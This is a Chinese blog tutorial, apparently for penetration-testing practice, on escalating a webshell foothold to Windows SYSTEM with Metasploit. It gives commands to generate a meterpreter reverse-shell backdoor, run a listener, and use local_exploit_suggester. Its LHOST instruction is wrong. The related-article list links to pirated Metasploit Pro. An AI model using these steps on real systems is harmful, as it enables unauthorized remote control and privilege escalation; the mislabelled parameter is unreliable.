windows提权--MSF全自动

最新推荐文章于 2024-08-06 10:19:57 发布
最新推荐文章于 2024-08-06 10:19:57 发布
阅读量537 收藏 6
点赞数 11
分类专栏: # 权限提升 文章标签: 笔记 网络 安全 网络安全 网络攻击模型 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/137962853
版权
本文详细指导如何在Linux上通过Metasploit创建反弹后门,监听会话,并利用exploit_suggester自动识别漏洞提权,适用于Windows系统攻防演练。
摘要由CSDN通过智能技术生成

免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等

目录

在linux上安装MSF

模拟场景:

1-生成反弹后门

2-配置监听会话

3-利用EXP提权

web--->system

拿到webshell后,我们通过MSF进行全自动的提权.

在linux上安装MSF

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 777 msfinstall
./msfinstall
msfconsole

模拟场景:

攻击机

靶机

--攻击机启动msf,生成后门(后面要反弹)(lhost为靶机ip地址,lport设置后别忘了.)

--攻击机 设置监听.(监听时 lhost 为0.0.0.0就行)

1-生成反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=靶机IP LPORT=监听端口 -f exe -o msf.exe

(这里生成后门的端口 .        后面监听的时候也要保持一致!!!)
--将生成的后门放到网站的webshell,攻击机监听后运行一下.

2-配置监听会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0		--所有网关的某个端口都监听.
set lport 7788
run	--进行监听

--靶机 运行 上面生成的后门 进行反弹.

--上线

--查看权限,是Administrator权限

--进行提权,全自动化,

3-利用EXP提权

 

background
use post/multi/recon/local_exploit_suggester
set showdescription true
set session 1
run


#use post/windows/gather/enum_patches(半自动:根据漏洞编号找出系统中安装的补J)
#use post/multi/recon/local_exploit_suggester(全自动:快速识别系统中可能被利用的漏洞)

--产生能利用的模块,

--use一下,继续配置(lhost设置攻击机的)

--这里尽然生成了一个xxx.exe

--那我们就到其目录下,然后运行,最后查看权限.

--拿下windows的system权限~

金灰
关注
专栏目录
红队内网攻防渗透:内网渗透之windows内网权限提升技术:哥斯拉&MSF&CS
HACKONE的博客
05-30 506
虚拟化:Docker,ESXi,QEMU,Hyper-V等。jsp由于机制的原因不需要提权,一般拿到的权限就是最高权限。目前的msf版本有bug可以TB上购买pro版本嘎嘎稳。集成软件:宝塔,PhpStudy,XAMMP等。ASP/ASP.NET/PHP/JSP等。全自动:快速识别系统中可能被利用的漏洞。自行搭建:自己一个个下载安装搭建配置。集成软件,自行搭建,虚拟化等。执行不了命令,所以需要提权
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4513
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
msf5 自动攻击模块 db_autopwn
07-10
msf5 自动攻击模块 db_autopwn msf5 自动攻击模块 db_autopwn
Metasploit自动攻击模块
weixin_33943347的博客
02-16 324
Metasploit自动攻击模块 Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references ...
使用MSF进行提权windows提权、linux提权、wesng使用
最新发布
2401_85773496的博客
08-06 896
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…不断更新大量的Exploit程序和报告,它的搜索功能可以搜索整个网站内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
2021-06-04msf结合漏扫模块suggester提权
qq_45290991的博客
06-04 698
转自月大佬的博客网站。。moonsec.com1、 windows 补丁审计工具使用 在终端下可以使用命令systeminfo 来查看系统的一些补丁信息 http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit
metasploit 自动化攻击
土拨鼠挖洞中的博客
10-04 2191
第一步开启postgresql数据库         第二步:切入到数据库中       第三步:创建用户名和密码       第四步进入数据库,创建数据库       第五步退出数据库进入msf       注意:1.开启数据库后进行的所有操作都可以保存在数据库中方便查阅       2.开启数据库后可以调用NMAP,nessus,等漏...
msfconsole攻击ftp_metasploit怎么利用扫描结果自动化攻击
weixin_39691055的博客
12-18 667
[*] (972/[*] (972/1454 [1 sessions]): Launching exploit/multi/http/apache_roller_ognl_injection against 192.168.86.130:8180...[*] (973/1454 [1 sessions]): Launching exploit/multi/http/apprain_upload_e...
CVE-2020-0787 Windows全版本本地提权漏洞复现
m0_56642842的博客
07-23 3182
0x00 简介 2020年3月,微软公布了一个影响范围堪称windows全版本的本地提权漏洞CVE-2020-0787,根据微软的漏洞描述,攻击者在使用低权限用户登录系统后,可以利用该漏洞构造恶意程序直接提权到administrator或者system权限。 0x01 漏洞概述 当Windows背景智能传输服务(BITS)没有正确处理符号链接时,存在特权提升漏洞。成功利用此漏洞的攻击者可以改写目标文件,从而提升权限。要利用这个漏洞,攻击者首先必须登录系统,攻击者可以运行EXP,利用该漏洞来提权进而完全控制受
msf --攻击MySQL 和简单实用
代码审计
04-21 4365
msfdb run(可以自动链接数据库) hosts services use auxiliary/scanner/mysql/mysql_version set PASS_FILE /home/kali/Desktop/yui.txt set exploit 步骤 mysql 爆破 root 密码 mysql_udf 上传udf mysql_sql 将执行的语句进行hex ...
155.网络安全渗透测试—[Cobalt Strike系列]—[权限提升/BypassUAC提权/MS14-058提权/PowerUp提权/MSF提权]
qwsn
03-28 1165
一、权限提升 1、BypassUAC 提权 2、CVE-2014-4113(MS14-058)提权 3、powerup 提权:服务权限配置不当 4、MSF 利用服务权限配置不当模块提权 二、提权测试 1、实验环境 2、BypassUAC提权 2、MS14-058提权 3、powerup提权:服务配置不当
metasploit自动化渗透攻击模块
11-18
metasploit自动化渗透攻击模块db_autopwn
Metasploit自动化攻击——装X必备
渗透测试
06-04 963
Metasploit自动化攻击——装X必备 (1)首先进行一次普通渗透 msf6 > search ms08_067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- -----
学习内网第九天--win7靶机提权
m0_59134926的博客
12-10 1063
上一篇的文件传输没有说完,然后再补充一个windows查看当前用户对某个文件的权限的命令。然后,这篇按照他的流程,是win7的靶机,用msfvenom生成木马拿shell,然后提权。1.文件传输的补充2.查看文件权限3.msf生成木马反弹shell4.windows7提权
windows安装Metasploit
天道酬勤
04-10 1331
windwos安装Metasploit
使用MSF进行提权windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
msf windows简单渗透
西部壮仔的博客
08-19 2005
建立后门 一 建立反弹后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f exe >shell.exe 二 监听端口建立回话 1 使用handler模块 msf > use exploit/multi/handler 2 设置payload msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tc
Windows之metasploit安装
2201_75735270的博客
12-23 1124
​​就是一个漏洞框架。它的全称叫做​​,简称叫做​​MSF​​。​​作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。0x01 安装、基本操作kali Linux自带Metasploit,直接使用命令msfconsole启动即可windows 可安装windows版本的msf,然后cmd启动msfconsole (windows最新版本​​下载链接​​) 提取码:5qmi​ 2、建立搜索缓存(数据库)启动​​数据库服务:​。
php-msf源码解析:生命周期与架构探索
"php-msf源码详解 - 一个关于php-msf源码的解析和学习指南,涵盖了框架的生命周期、架构、协程等关键概念。作者建议通过理解工具的用途和工程化视角来深入学习,并提供了配合使用的工具推荐,如phpstorm、百度脑图和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值